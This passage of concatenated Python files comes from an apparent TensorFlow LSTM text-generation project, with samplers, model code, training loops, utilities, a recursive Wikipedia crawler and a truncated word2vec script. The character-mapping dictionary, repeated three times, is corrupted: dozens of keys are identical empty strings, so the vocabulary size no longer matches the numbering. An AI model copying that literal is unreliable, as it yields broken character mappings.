'': 168, '': 169, '': 170, '': 171, '': 172, '': 173, '': 174, '': 175, '': 176, '': 177, '': 178, '': 179, '': 180, '': 181, '': 182, '': 183, '': 184, '': 185, '': 186, '': 187, '': 188, '': 189, '': 190, '': 191, '': 192}
# Sampling-mode network (batch/steps of 1) plus a saver to restore weights.
model = train_chars.CharRNN(len(char2int_target), lstm_size=train_chars.lstm_size, sampling=True)
saver = train_chars.tf.train.Saver()
def pick_top_n(preds, vocab_size, top_n=5):
    """Sample one class id among the top_n most probable predictions.

    Note: zeroes the non-top entries of `preds` in place (squeeze returns
    a view), matching the original behavior.
    """
    probs = np.squeeze(preds)
    # Zero everything except the top_n most probable classes...
    drop = np.argsort(probs)[:-top_n]
    probs[drop] = 0
    # ...then renormalize and draw one class id from the remainder.
    probs = probs / np.sum(probs)
    return np.random.choice(vocab_size, 1, p=probs)[0]
def write_sample(checkpoint, lstm_size, vocab_size, char2int, int2char, prime="import"):
    """Restore `checkpoint` and "type" generated characters forever.

    Instead of returning text, each generated character is written through
    the `keyboard` module into whatever window has focus.  The generation
    loop never terminates; kill the process to stop it.

    NOTE(review): `lstm_size` is unused here (the module-level model fixes
    it), and `time` must already exist as a module-level name -- the
    __main__ block below imports it before calling this function.
    """
    # samples = [c for c in prime]
    with train_chars.tf.Session() as sess:
        saver.restore(sess, checkpoint)
        new_state = sess.run(model.initial_state)
        # Feed the primer one character at a time, carrying the LSTM state.
        for c in prime:
            x = np.zeros((1, 1))
            x[0,0] = char2int[c]
            feed = {model.inputs: x,
                    model.keep_prob: 1.,
                    model.initial_state: new_state}
            preds, new_state = sess.run([model.prediction, model.final_state],
                                        feed_dict=feed)
        # print("Preds:", preds)
        c = pick_top_n(preds, vocab_size)
        char = int2char[c]
        keyboard.write(char)
        time.sleep(0.01)
        # samples.append(char)
        # Free-run forever: each sampled character becomes the next input.
        while True:
            x[0,0] = c
            feed = {model.inputs: x,
                    model.keep_prob: 1.,
                    model.initial_state: new_state}
            preds, new_state = sess.run([model.prediction, model.final_state],
                                        feed_dict=feed)
            c = pick_top_n(preds, vocab_size)
            char = int2char[c]
            keyboard.write(char)
            time.sleep(0.01)
            # samples.append(char)
    # return ''.join(samples)
if __name__ == "__main__":
    # checkpoint = train_chars.tf.train_chars.latest_checkpoint("checkpoints")
    # print(checkpoint)
    # Hard-coded checkpoint from a previous character-level training run.
    checkpoint = "checkpoints/i6291_l256.ckpt"
    print()
    # NOTE(review): f is opened but never used or closed in this script.
    f = open("generates/python.txt", "a", encoding="utf8")
    int2char_target = { v:k for k, v in char2int_target.items() }
    # This import makes `time` a module-level name, which write_sample uses.
    import time
    # Two-second pause to switch focus to the target window before typing.
    time.sleep(2)
    write_sample(checkpoint, train_chars.lstm_size, len(char2int_target), char2int_target, int2char_target, prime="#"*100)
# Force CPU-only execution: hide all CUDA devices before TensorFlow loads.
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
# Session config pinning TensorFlow to one CPU (5 threads) and no GPUs.
config = tf.ConfigProto(intra_op_parallelism_threads=5,
                        inter_op_parallelism_threads=5,
                        allow_soft_placement=True,
                        device_count = {'CPU' : 1,
                                        'GPU' : 0}
                        )
import train_chars
import numpy as np
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, '': 30, '<': 31, '=': 32, '>': 33, '?': 34, '':
35, 'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '': 67, 'a': 68, 'b': 69, 'c':
70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '': 97, '': 98, '': 99, '': 100, '': 101, '': 102, '': 103, '': 104, '': 105, '\xad': 106, '': 107, '': 108, '': 109, '': 110, '': 111, '': 112, '': 113, '': 114, '': 115, '': 116, '': 117, '': 118, '': 119, '': 120, '': 121, '': 122, '': 123, '': 124, '': 125, '': 126, '': 127, '': 128, '': 129, '': 130, '': 131, '': 132, '': 133, '': 134, '': 135, '': 136, '': 137, '': 138, '': 139, '': 140, '': 141, '': 142, '': 143, '': 144, '': 145, '': 146, '': 147, '': 148, '': 149, '': 150, '': 151, '': 152, '': 153, '': 154, '': 155, '': 156, '': 157, '': 158, '': 159, '': 160, '': 161, '': 162, '': 163, '': 164, '': 165, '': 166, '': 167,
'': 168, '': 169, '': 170, '': 171, '': 172, '': 173, '': 174, '': 175, '': 176, '': 177, '': 178, '': 179, '': 180, '': 181, '': 182, '': 183, '': 184, '': 185, '': 186, '': 187, '': 188, '': 189, '': 190, '': 191, '': 192}
# Sampling-mode network (batch/steps of 1) plus a saver to restore weights.
model = train_chars.CharRNN(len(char2int_target), lstm_size=train_chars.lstm_size, sampling=True)
saver = train_chars.tf.train.Saver()
def pick_top_n(preds, vocab_size, top_n=5):
    """Draw one class id, restricted to the top_n most probable classes.

    Mutates `preds` through the squeezed view (non-top entries become 0),
    exactly as the original did.
    """
    flat = np.squeeze(preds)
    # Indices of everything below the top_n cutoff get zeroed out.
    flat[np.argsort(flat)[:-top_n]] = 0
    renormed = flat / np.sum(flat)
    choice = np.random.choice(vocab_size, 1, p=renormed)
    return choice[0]
def sample(checkpoint, n_samples, lstm_size, vocab_size, char2int, int2char, prime="The"):
    """Restore `checkpoint` and generate n_samples characters after `prime`.

    checkpoint: TF checkpoint path to restore weights from.
    n_samples: number of characters to generate after the primer.
    lstm_size: unused here -- NOTE(review): the module-level model fixes it.
    vocab_size: number of character classes, forwarded to pick_top_n.
    char2int / int2char: maps between characters and class ids.
    prime: seed text fed through the network before free-running generation.
    Returns the primer plus generated text as one string.
    """
    samples = [c for c in prime]
    with train_chars.tf.Session() as sess:
        saver.restore(sess, checkpoint)
        new_state = sess.run(model.initial_state)
        # Feed the primer one character at a time, carrying the LSTM state.
        for c in prime:
            x = np.zeros((1, 1))
            x[0,0] = char2int[c]
            feed = {model.inputs: x,
                    model.keep_prob: 1.,
                    model.initial_state: new_state}
            preds, new_state = sess.run([model.prediction, model.final_state],
                                        feed_dict=feed)
        # print("Preds:", preds)
        c = pick_top_n(preds, vocab_size)
        samples.append(int2char[c])
        # Free-running generation: each sampled char becomes the next input.
        for i in range(n_samples):
            x[0,0] = c
            feed = {model.inputs: x,
                    model.keep_prob: 1.,
                    model.initial_state: new_state}
            preds, new_state = sess.run([model.prediction, model.final_state],
                                        feed_dict=feed)
            c = pick_top_n(preds, vocab_size)
            char = int2char[c]
            samples.append(char)
            # (disabled) keep generating past n_samples until a word boundary:
            # if i == n_samples - 1 and char != " ":
            #     while char != " ":
            #         x[0,0] = c
            #         feed = {model.inputs: x,
            #                 model.keep_prob: 1.,
            #                 model.initial_state: new_state}
            #         preds, new_state = sess.run([model.prediction, model.final_state],
            #                                     feed_dict=feed)
            #         c = pick_top_n(preds, vocab_size)
            #         char = int2char[c]
            #         samples.append(char)
    return ''.join(samples)
if __name__ == "__main__":
    # checkpoint = train_chars.tf.train_chars.latest_checkpoint("checkpoints")
    # print(checkpoint)
    # Hard-coded checkpoint from a previous character-level training run.
    checkpoint = "checkpoints/i6291_l256.ckpt"
    print()
    int2char_target = { v:k for k, v in char2int_target.items() }
    # FIX: the original opened the log file and never closed it; the
    # context manager guarantees the handle is flushed and closed even if
    # sampling raises.
    with open("generates/python.txt", "a", encoding="utf8") as f:
        for prime in ["#"*100]:
            samp = sample(checkpoint, 5000, train_chars.lstm_size, len(char2int_target), char2int_target, int2char_target, prime=prime)
            print(samp, file=f)
            print(samp)
            print("="*50)
            print("="*50, file=f)
import numpy as np
import train_words
def pick_top_n(preds, vocab_size, top_n=5):
    """Sample a single class id from the top_n highest-probability classes.

    The squeezed view of `preds` is zeroed in place outside the top_n,
    matching the original's side effect.
    """
    weights = np.squeeze(preds)
    below_cutoff = np.argsort(weights)[:-top_n]
    weights[below_cutoff] = 0
    # Renormalize so the surviving entries form a valid distribution.
    weights = weights / np.sum(weights)
    return np.random.choice(vocab_size, 1, p=weights)[0]
def sample(checkpoint, n_samples, lstm_size, vocab_size, prime=["The"]):
    """Restore `checkpoint` and generate n_samples words after `prime`.

    prime: list of seed words.  NOTE(review): mutable default argument is
    shared across calls -- harmless here because it is never mutated.
    Returns the primer plus generated words joined with spaces.
    """
    samples = [c for c in prime]
    # Word-level sampling model (batch/steps of 1) built fresh per call.
    model = train_words.CharRNN(len(train_words.vocab), lstm_size=lstm_size, sampling=True)
    saver = train_words.tf.train.Saver()
    with train_words.tf.Session() as sess:
        saver.restore(sess, checkpoint)
        new_state = sess.run(model.initial_state)
        # Feed the primer words one at a time, carrying the LSTM state.
        for c in prime:
            x = np.zeros((1, 1))
            x[0,0] = train_words.vocab_to_int[c]
            feed = {model.inputs: x,
                    model.keep_prob: 1.,
                    model.initial_state: new_state}
            preds, new_state = sess.run([model.prediction, model.final_state],
                                        feed_dict=feed)
        c = pick_top_n(preds, len(train_words.vocab))
        samples.append(train_words.int_to_vocab[c])
        # Free-running generation: each sampled word becomes the next input.
        for i in range(n_samples):
            x[0,0] = c
            feed = {model.inputs: x,
                    model.keep_prob: 1.,
                    model.initial_state: new_state}
            preds, new_state = sess.run([model.prediction, model.final_state],
                                        feed_dict=feed)
            c = pick_top_n(preds, len(train_words.vocab))
            char = train_words.int_to_vocab[c]
            samples.append(char)
    return ' '.join(samples)
if __name__ == "__main__":
    # checkpoint = train_words.tf.train_words.latest_checkpoint("checkpoints")
    # print(checkpoint)
    # Hard-coded checkpoint from a previous word-level training run.
    checkpoint = f"{train_words.CHECKPOINT}/i8000_l128.ckpt"
    samp = sample(checkpoint, 400, train_words.lstm_size, len(train_words.vocab), prime=["the", "very"])
    print(samp)
import tensorflow as tf
import numpy as np
def get_batches(arr, batch_size, n_steps):
    """Yield (input, target) batches of shape (batch_size, n_steps) from arr.

    Arguments
    ---------
    arr: Array to make batches from
    batch_size: Number of sequences per batch
    n_steps: Number of sequence steps per batch

    Targets are the inputs shifted one step left; the final target column
    is zero-padded when no further data exists.
    """
    per_batch = batch_size * n_steps
    n_batches = len(arr) // per_batch
    # Drop the tail that cannot fill a whole batch, then lay the data out
    # as batch_size parallel rows.
    arr = arr[:per_batch * n_batches].reshape((batch_size, -1))
    for start in range(0, arr.shape[1], n_steps):
        x = arr[:, start:start + n_steps]
        shifted = arr[:, start + 1:start + n_steps + 1]
        y = np.zeros(x.shape, dtype=shifted.dtype)
        y[:, :shifted.shape[1]] = shifted
        yield x, y
# batches = get_batches(encoded, 10, 50)
# x, y = next(batches)
def build_inputs(batch_size, num_steps):
    """Create the graph's input, target, and dropout placeholders.

    batch_size: number of sequences per batch.
    num_steps: number of time steps per sequence.
    Returns (inputs, targets, keep_prob).
    """
    shape = (batch_size, num_steps)
    inputs = tf.placeholder(tf.int32, shape=shape, name="inputs")
    targets = tf.placeholder(tf.int32, shape=shape, name="targets")
    # Scalar dropout keep-probability, fed differently for train vs sample.
    keep_prob = tf.placeholder(tf.float32, name="keep_prob")
    return inputs, targets, keep_prob
def build_lstm(lstm_size, num_layers, batch_size, keep_prob):
    """Stack num_layers dropout-wrapped BasicLSTMCells.

    lstm_size: hidden-layer size of each LSTM cell.
    num_layers: number of stacked LSTM layers.
    batch_size: batch size used to build the zero state.
    keep_prob: scalar tensor for the dropout keep probability.
    Returns (cell, initial_state) where initial_state is all zeros.
    """
    def make_cell():
        # One LSTM layer with dropout applied to its outputs.
        base = tf.contrib.rnn.BasicLSTMCell(lstm_size)
        return tf.contrib.rnn.DropoutWrapper(base, output_keep_prob=keep_prob)

    # Stack the layers into one deep recurrent cell.
    stacked = tf.contrib.rnn.MultiRNNCell([make_cell() for _ in range(num_layers)])
    zero_state = stacked.zero_state(batch_size, tf.float32)
    return stacked, zero_state
def build_output(lstm_output, in_size, out_size):
    """Project LSTM outputs through a softmax layer.

    lstm_output: output tensors from the LSTM layer.
    in_size: width of the LSTM output (lstm_size).
    out_size: number of output classes.
    Returns (softmax probabilities, raw logits).
    """
    # Flatten (batch, steps, lstm_size) into rows of in_size features:
    # one row per step per sequence.
    flat = tf.reshape(tf.concat(lstm_output, axis=1), (-1, in_size))
    # Weight and bias variables live in their own scope so checkpoints
    # keep stable names.
    with tf.variable_scope('softmax'):
        weights = tf.Variable(tf.truncated_normal((in_size, out_size), stddev=0.1))
        bias = tf.Variable(tf.zeros(out_size))
    logits = tf.matmul(flat, weights) + bias
    # Per-row class probabilities, used for sampling.
    probabilities = tf.nn.softmax(logits, name="predictions")
    return probabilities, logits
def build_loss(logits, targets, num_classes):
    """Mean softmax cross-entropy between logits and one-hot targets.

    logits: output of the final fully connected layer.
    targets: integer class targets.
    num_classes: number of classes in targets.
    """
    # One-hot encode and reshape targets to line up with the flattened
    # logits (one row per sequence per step).
    one_hot = tf.one_hot(targets, num_classes)
    aligned = tf.reshape(one_hot, logits.get_shape())
    per_row = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=aligned)
    return tf.reduce_mean(per_row)
def build_optimizer(loss, learning_rate, grad_clip):
    """Adam optimizer with global-norm gradient clipping.

    loss: network loss tensor.
    learning_rate: optimizer learning rate.
    grad_clip: clipping threshold guarding against exploding gradients.
    """
    trainable = tf.trainable_variables()
    clipped, _ = tf.clip_by_global_norm(tf.gradients(loss, trainable), grad_clip)
    adam = tf.train.AdamOptimizer(learning_rate)
    return adam.apply_gradients(zip(clipped, trainable))
class CharRNN:
    """Character-level LSTM language model (TF1 static graph).

    With sampling=True the graph is built with batch_size = num_steps = 1
    so single characters can be fed during generation; otherwise the given
    training batch geometry is used.
    """
    def __init__(self, num_classes, batch_size=64, num_steps=50,
                 lstm_size=128, num_layers=2, learning_rate=0.001,
                 grad_clip=5, sampling=False):
        # When we're using this network for sampling later, we'll be passing in
        # one character at a time, so providing an option for that
        if sampling:
            batch_size, num_steps = 1, 1
        else:
            batch_size, num_steps = batch_size, num_steps
        # Start from a clean graph so repeated construction does not collide.
        tf.reset_default_graph()
        # Build the input placeholder tensors
        self.inputs, self.targets, self.keep_prob = build_inputs(batch_size, num_steps)
        # Build the LSTM cell
        # (lstm_size, num_layers, batch_size, keep_prob)
        cell, self.initial_state = build_lstm(lstm_size, num_layers, batch_size, self.keep_prob)
        ### Run the data through the RNN layers
        # First, one-hot encode the input tokens
        x_one_hot = tf.one_hot(self.inputs, num_classes)
        # Run each sequence step through the RNN with tf.nn.dynamic_rnn
        outputs, state = tf.nn.dynamic_rnn(cell, x_one_hot, initial_state=self.initial_state)
        self.final_state = state
        # Get softmax predictions and logits
        # (lstm_output, in_size, out_size)
        # There are lstm_size nodes in hidden layers, and the number
        # of the total characters as num_classes (i.e output layer)
        self.prediction, self.logits = build_output(outputs, lstm_size, num_classes)
        # Loss and optimizer (with gradient clipping)
        # (logits, targets, lstm_size, num_classes)
        self.loss = build_loss(self.logits, self.targets, num_classes)
        # (loss, learning_rate, grad_clip)
        self.optimizer = build_optimizer(self.loss, learning_rate, grad_clip)
from time import perf_counter
from collections import namedtuple
from parameters import *
from train import *
from utils import get_time, get_text
import tqdm
import numpy as np
import os
import string
import tensorflow as tf
if __name__ == "__main__":
    CHECKPOINT = "checkpoints"
    if not os.path.isdir(CHECKPOINT):
        os.mkdir(CHECKPOINT)
    # Build the character vocabulary and load the full corpus text.
    vocab, int2char, char2int, text = get_text(char_level=True,
                                               files=["E:\\datasets\\python_code_small.py", "E:\\datasets\\my_python_code.py"],
                                               load=False,
                                               lower=False,
                                               save_index=4)
    print(char2int)
    # Encode every character as its integer class id.
    encoded = np.array([char2int[c] for c in text])
    print("[*] Total characters :", len(text))
    print("[*] Number of classes :", len(vocab))
    model = CharRNN(num_classes=len(vocab), batch_size=batch_size, num_steps=num_steps,
                    lstm_size=lstm_size, num_layers=num_layers,
                    learning_rate=learning_rate)
    saver = tf.train.Saver(max_to_keep=100)
    with tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=NUM_THREADS)) as sess:
        sess.run(tf.global_variables_initializer())
        # Use the line below to load a checkpoint and resume training
        saver.restore(sess, f'{CHECKPOINT}/e13_l256.ckpt')
        total_steps = len(encoded) // batch_size // num_steps
        # Resuming at epoch 14 to match the restored e13 checkpoint above.
        for e in range(14, epochs):
            # Train network
            cs = 0
            new_state = sess.run(model.initial_state)
            min_loss = np.inf
            batches = tqdm.tqdm(get_batches(encoded, batch_size, num_steps),
                                f"Epoch= {e+1}/{epochs} - {cs}/{total_steps}",
                                total=total_steps)
            for x, y in batches:
                cs += 1
                start = perf_counter()
                feed = {model.inputs: x,
                        model.targets: y,
                        model.keep_prob: keep_prob,
                        model.initial_state: new_state}
                batch_loss, new_state, _ = sess.run([model.loss,
                                                     model.final_state,
                                                     model.optimizer],
                                                    feed_dict=feed)
                batches.set_description(f"Epoch: {e+1}/{epochs} - {cs}/{total_steps} loss:{batch_loss:.2f}")
            # Checkpoint at the end of every epoch, then once more overall.
            saver.save(sess, f"{CHECKPOINT}/e{e}_l{lstm_size}.ckpt")
        print("Loss:", batch_loss)
        saver.save(sess, f"{CHECKPOINT}/i{cs}_l{lstm_size}.ckpt")
from time import perf_counter
from collections import namedtuple
from colorama import Fore, init
# local
from parameters import *
from train import *
from utils import get_time, get_text
init()
GREEN = Fore.GREEN
RESET = Fore.RESET
import numpy as np
import os
import tensorflow as tf
import string
# Directory for word-level training checkpoints and the corpora to train on.
CHECKPOINT = "checkpoints_words"
files = ["carroll-alice.txt", "text.txt", "text8.txt"]
if not os.path.isdir(CHECKPOINT):
    os.mkdir(CHECKPOINT)
# Build the word vocabulary, encode the corpus, then drop the raw text to
# free memory.
vocab, int2word, word2int, text = get_text("data", files=files)
encoded = np.array([word2int[w] for w in text])
del text
if __name__ == "__main__":
    def calculate_time():
        """Update the shared timing statistics after one training step.

        Mutates the module-level timing globals; `start` must have been set
        (via perf_counter) just before the step being measured.
        """
        global time_took
        global start
        global total_time_took
        global times_took
        global avg_time_took
        global time_estimated
        global total_steps
        time_took = perf_counter() - start
        total_time_took += time_took
        times_took.append(time_took)
        avg_time_took = sum(times_took) / len(times_took)
        # Remaining time = average step cost * steps left.
        time_estimated = total_steps * avg_time_took - total_time_took
    model = CharRNN(num_classes=len(vocab), batch_size=batch_size, num_steps=num_steps,
                    lstm_size=lstm_size, num_layers=num_layers,
                    learning_rate=learning_rate)
    saver = tf.train.Saver(max_to_keep=100)
    with tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=NUM_THREADS)) as sess:
        sess.run(tf.global_variables_initializer())
        # Use the line below to load a checkpoint and resume training
        # saver.restore(sess, f'{CHECKPOINT}/i3524_l128_loss=1.36.ckpt')
        # calculate total steps
        total_steps = epochs * len(encoded) / (batch_size * num_steps)
        time_estimated = "N/A"
        times_took = []
        total_time_took = 0
        current_steps = 0
        progress_percentage = 0
        for e in range(epochs):
            # Train network
            new_state = sess.run(model.initial_state)
            min_loss = np.inf
            for x, y in get_batches(encoded, batch_size, num_steps):
                current_steps += 1
                start = perf_counter()
                feed = {model.inputs: x,
                        model.targets: y,
                        model.keep_prob: keep_prob,
                        model.initial_state: new_state}
                batch_loss, new_state, _ = sess.run([model.loss,
                                                     model.final_state,
                                                     model.optimizer],
                                                    feed_dict=feed)
                progress_percentage = current_steps * 100 / total_steps
                # New best loss: log it in green and skip the periodic print.
                if batch_loss < min_loss:
                    # saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}_loss={batch_loss:.2f}.ckpt")
                    min_loss = batch_loss
                    calculate_time()
                    print(f'{GREEN}[{progress_percentage:.2f}%] Epoch: {e+1:3}/{epochs} Training loss: {batch_loss:2.4f} - {time_took:2.4f} s/batch - ETA: {get_time(time_estimated)}{RESET}')
                    continue
                # Periodic progress line, overwritten in place via '\r'.
                if (current_steps % print_every_n == 0):
                    calculate_time()
                    print(f'[{progress_percentage:.2f}%] Epoch: {e+1:3}/{epochs} Training loss: {batch_loss:2.4f} - {time_took:2.4f} s/batch - ETA: {get_time(time_estimated)}', end='\r')
                if (current_steps % save_every_n == 0):
                    saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}.ckpt")
        saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}.ckpt")
import tqdm
import os
import inflect
import glob
import pickle
import sys
from string import punctuation, whitespace
# Inflect engine for number-to-word normalization; UNK marks out-of-vocab
# tokens in the cleaned corpus.
p = inflect.engine()
UNK = "<unk>"
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, '': 30, '<': 31, '=': 32, '>': 33, '?': 34, '':
35, 'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '': 67, 'a': 68, 'b': 69, 'c':
70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '': 97, '': 98, '': 99, '': 100, '': 101, '': 102, '': 103, '': 104, '': 105, '\xad': 106, '': 107, '': 108, '': 109, '': 110, '': 111, '': 112, '': 113, '': 114, '': 115, '': 116, '': 117, '': 118, '': 119, '': 120, '': 121, '': 122, '': 123, '': 124, '': 125, '': 126, '': 127, '': 128, '': 129, '': 130, '': 131, '': 132, '': 133, '': 134, '': 135, '': 136, '': 137, '': 138, '': 139, '': 140, '': 141, '': 142, '': 143, '': 144, '': 145, '': 146, '': 147, '': 148, '': 149, '': 150, '': 151, '': 152, '': 153, '': 154, '': 155, '': 156, '': 157, '': 158, '': 159, '': 160, '': 161, '': 162, '': 163, '': 164, '': 165, '': 166, '': 167,
'': 168, '': 169, '': 170, '': 171, '': 172, '': 173, '': 174, '': 175, '': 176, '': 177, '': 178, '': 179, '': 180, '': 181, '': 182, '': 183, '': 184, '': 185, '': 186, '': 187, '': 188, '': 189, '': 190, '': 191, '': 192}
def get_time(seconds, form="{hours:02}:{minutes:02}:{seconds:02}"):
    """Convert a number of seconds into a human-readable duration string.

    Non-numeric input is returned unchanged. A month is approximated as
    30 days and a year as 12 such months.

    :param seconds: duration in seconds (anything `int()` accepts)
    :param form: format template for the hours/minutes/seconds part
    :return: formatted string, or `seconds` itself when not numeric
    """
    try:
        seconds = int(seconds)
    except (TypeError, ValueError):
        # not a number (e.g. already a formatted string) -> return as-is
        return seconds
    minutes, seconds = divmod(seconds, 60)
    hours, minutes = divmod(minutes, 60)
    days, hours = divmod(hours, 24)
    months, days = divmod(days, 30)
    years, months = divmod(months, 12)
    # Prepend each larger unit only when it is non-zero.
    # BUG FIX: the original used `if months: ... elif years: ...`, so the
    # years were silently dropped whenever the month remainder was non-zero;
    # each unit is now prepended independently.
    if days:
        form = "{days}d " + form
    if months:
        form = "{months}m " + form
    if years:
        form = "{years}y " + form
    return form.format(**locals())
def get_text(path="data",
            files=["carroll-alice.txt", "text.txt", "text8.txt"],
            load=True,
            char_level=False,
            lower=True,
            save=True,
            save_index=1):
    """Load, clean and tokenize a text corpus, with pickle-based caching.

    When `load` is True, a previously pickled corpus under `path` is reused
    (interactively prompting the user when several exist). Otherwise the
    given .txt files are read, filtered to characters present in
    `char2int_target`, split into characters (`char_level=True`) or words,
    and optionally pickled for future runs.

    Returns a tuple (vocab, int2word, word2int, tokens).

    NOTE(review): `files=[...]` is a mutable default argument; it is only
    read here, but replacing it with None + a local default would be safer.
    """
    if load:
        # check if any pre-cleaned saved data exists first
        pickle_files = glob.glob(os.path.join(path, "text_data*.pickle"))
        if len(pickle_files) == 1:
            return pickle.load(open(pickle_files[0], "rb"))
        elif len(pickle_files) > 1:
            # several caches: list them with sizes and ask the user to pick
            sizes = [ get_size(os.path.getsize(p)) for p in pickle_files ]
            s = ""
            for i, (file, size) in enumerate(zip(pickle_files, sizes), start=1):
                s += str(i) + " - " + os.path.basename(file) + f" ({size}) \n"
            choice = int(input(f"""Multiple data corpus found:
            {s}
            99 - use and clean .txt files
            Please choose one: """))
            if choice != 99:
                chosen_file = pickle_files[choice-1]
                print("[*] Loading pickled data...")
                return pickle.load(open(chosen_file, "rb"))
    # no cache chosen: read and concatenate the raw .txt corpora
    text = ""
    for file in tqdm.tqdm(files, "Loading data"):
        file = os.path.join(path, file)
        with open(file) as f:
            if lower:
                text += f.read().lower()
            else:
                text += f.read()
    print(len(text))
    punc = set(punctuation)
    # keep only characters that have an entry in the target charset
    # text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c not in punc ])
    text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c in char2int_target ])
    # for ws in whitespace:
    #     text = text.replace(ws, " ")
    if char_level:
        text = list(text)
    else:
        text = text.split()
    # digit->word normalization below was disabled; tokens are used as-is
    # new_text = []
    new_text = text
    # append = new_text.append
    # co = 0
    # if char_level:
    #     k = 0
    #     for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
    #         if not text[i].isdigit():
    #             append(text[i])
    #             k = 0
    #         else:
    #             # if this digit is mapped to a word already using
    #             # the below method, then just continue
    #             if k >= 1:
    #                 k -= 1
    #                 continue
    #             # if there are more digits following this character
    #             # k = 0
    #             digits = ""
    #             while text[i+k].isdigit():
    #                 digits += text[i+k]
    #                 k += 1
    #             w = p.number_to_words(digits).replace("-", " ").replace(",", "")
    #             for c in w:
    #                 append(c)
    #             co += 1
    # else:
    #     for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
    #         # convert digits to words
    #         # (i.e '7' to 'seven')
    #         if text[i].isdigit():
    #             text[i] = p.number_to_words(text[i]).replace("-", " ")
    #             append(text[i])
    #             co += 1
    #         else:
    #             append(text[i])
    # build vocabulary and the two lookup tables
    vocab = sorted(set(new_text))
    print(f"alices in vocab:", "alices" in vocab)
    # print(f"Converted {co} digits to words.")
    print(f"Total vocabulary size:", len(vocab))
    int2word = { i:w for i, w in enumerate(vocab) }
    word2int = { w:i for i, w in enumerate(vocab) }
    if save:
        # cache the cleaned corpus so the next run can skip the cleaning pass
        pickle_filename = os.path.join(path, f"text_data_{save_index}.pickle")
        print("Pickling data for future use to", pickle_filename)
        pickle.dump((vocab, int2word, word2int, new_text), open(pickle_filename, "wb"))
    return vocab, int2word, word2int, new_text
def get_size(size, suffix="B"):
    """Render a byte count as a human-readable string, e.g. 1536 -> '1.50KB'.

    Scales by powers of 1024 through the K/M/G/T/P prefixes; anything
    larger falls through to the 'E' (exa) prefix.
    """
    remaining = size
    for prefix in ("", "K", "M", "G", "T", "P"):
        if remaining < 1024:
            return f"{remaining:.2f}{prefix}{suffix}"
        remaining = remaining / 1024
    # larger than pebibytes: report with the exa prefix
    return f"{remaining:.2f}E{suffix}"
import wikipedia
from threading import Thread
def gather(page_name):
    """Download a Wikipedia page, dump its plain-text content under data/,
    then spawn threads that recursively crawl its first five linked pages.

    :param page_name: title of the Wikipedia article to fetch
    """
    print(f"Crawling {page_name}")
    page = wikipedia.page(page_name)
    # spaces are not filesystem friendly; use underscores in the file name
    filename = page_name.replace(" ", "_")
    # BUG FIX: `filename` was computed but never used (the output path was a
    # literal), so every crawled page overwrote the same file; the handle was
    # also never closed -- write through a context manager instead.
    with open(f"data/{filename}.txt", 'w', encoding="utf-8") as out:
        print(page.content, file=out)
    print(f"Done crawling {page_name}")
    # crawl (at most) the first five outgoing links concurrently
    for i in range(5):
        Thread(target=gather, args=(page.links[i],)).start()
if __name__ == "__main__":
    # seed the crawl with a single starting article
    seed_pages = ["Relativity"]
    for page_title in seed_pages:
        gather(page_title)
# from keras.preprocessing.text import Tokenizer
from utils import chunk_seq
from collections import Counter
from nltk.corpus import stopwords
from keras.preprocessing.sequence import pad_sequences
import numpy as np
import gensim
# Script: read a cleaned Quran corpus, drop Arabic stop words, encode/pad
# the ayat, then train and save a gensim Word2Vec model.
sequence_length = 200
embedding_dim = 200
# window_size = 7
# vector_dim = 300
# epochs = 1000
# valid_size = 16 # Random set of words to evaluate similarity on.
# valid_window = 100  # Only pick dev samples in the head of the distribution.
# valid_examples = np.random.choice(valid_window, valid_size, replace=False)
with open("data/quran_cleaned.txt", encoding="utf8") as f:
